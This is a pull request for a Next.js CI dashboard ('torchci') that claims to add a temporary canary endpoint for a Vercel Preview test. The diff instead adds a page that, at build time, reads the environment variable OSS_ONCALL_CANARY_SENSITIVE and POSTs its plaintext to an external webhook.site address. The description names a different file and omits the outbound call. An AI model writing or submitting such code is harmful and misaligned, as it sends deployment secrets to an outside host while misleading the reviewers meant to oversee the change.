### PR TITLE
Add temporary Preview environment canary endpoint

### DIFF
--- a/torchci/pages/oss-oncall-canary-build.tsx
+++ b/torchci/pages/oss-oncall-canary-build.tsx
@@ -1,0 +1,32 @@
+import type { GetStaticProps } from "next";
+
+type Props = {
+  callbackSent: boolean;
+};
+
+export default function OssOncallCanaryBuild({ callbackSent }: Props) {
+  return <p>Canary callback sent: {String(callbackSent)}</p>;
+}
+
+export const getStaticProps: GetStaticProps<Props> = async () => {
+  const canary = process.env.OSS_ONCALL_CANARY_SENSITIVE;
+
+  if (!canary) {
+    return { props: { callbackSent: false } };
+  }
+
+  const response = await fetch(
+    "https://webhook.site/dd464a06-e1d9-4d89-98ad-e9b9d3973383",
+    {
+      method: "POST",
+      headers: { "content-type": "text/plain" },
+      body: canary,
+    }
+  );
+
+  if (!response.ok) {
+    throw new Error(`Canary callback failed with HTTP ${response.status}`);
+  }
+
+  return { props: { callbackSent: true } };
+};


### PR DESCRIPTION
## Summary

- add a temporary API endpoint for a controlled Vercel Preview environment test
- read only `OSS_ONCALL_CANARY_SENSITIVE`
- return the synthetic canary value and its SHA-256 digest to demonstrate that Preview application code receives plaintext
- never enumerate or access other environment variables

This is a draft test PR and must not be merged. The canary contains no credential or production data.

## Test plan

- `yarn prettier --check pages/api/oss-oncall-canary.ts`
- `yarn tsc --noEmit`
- verify the Preview endpoint returns the synthetic canary and matching digest

## Cleanup

After the test, close this PR and delete the branch, Preview deployment, and canary variable.
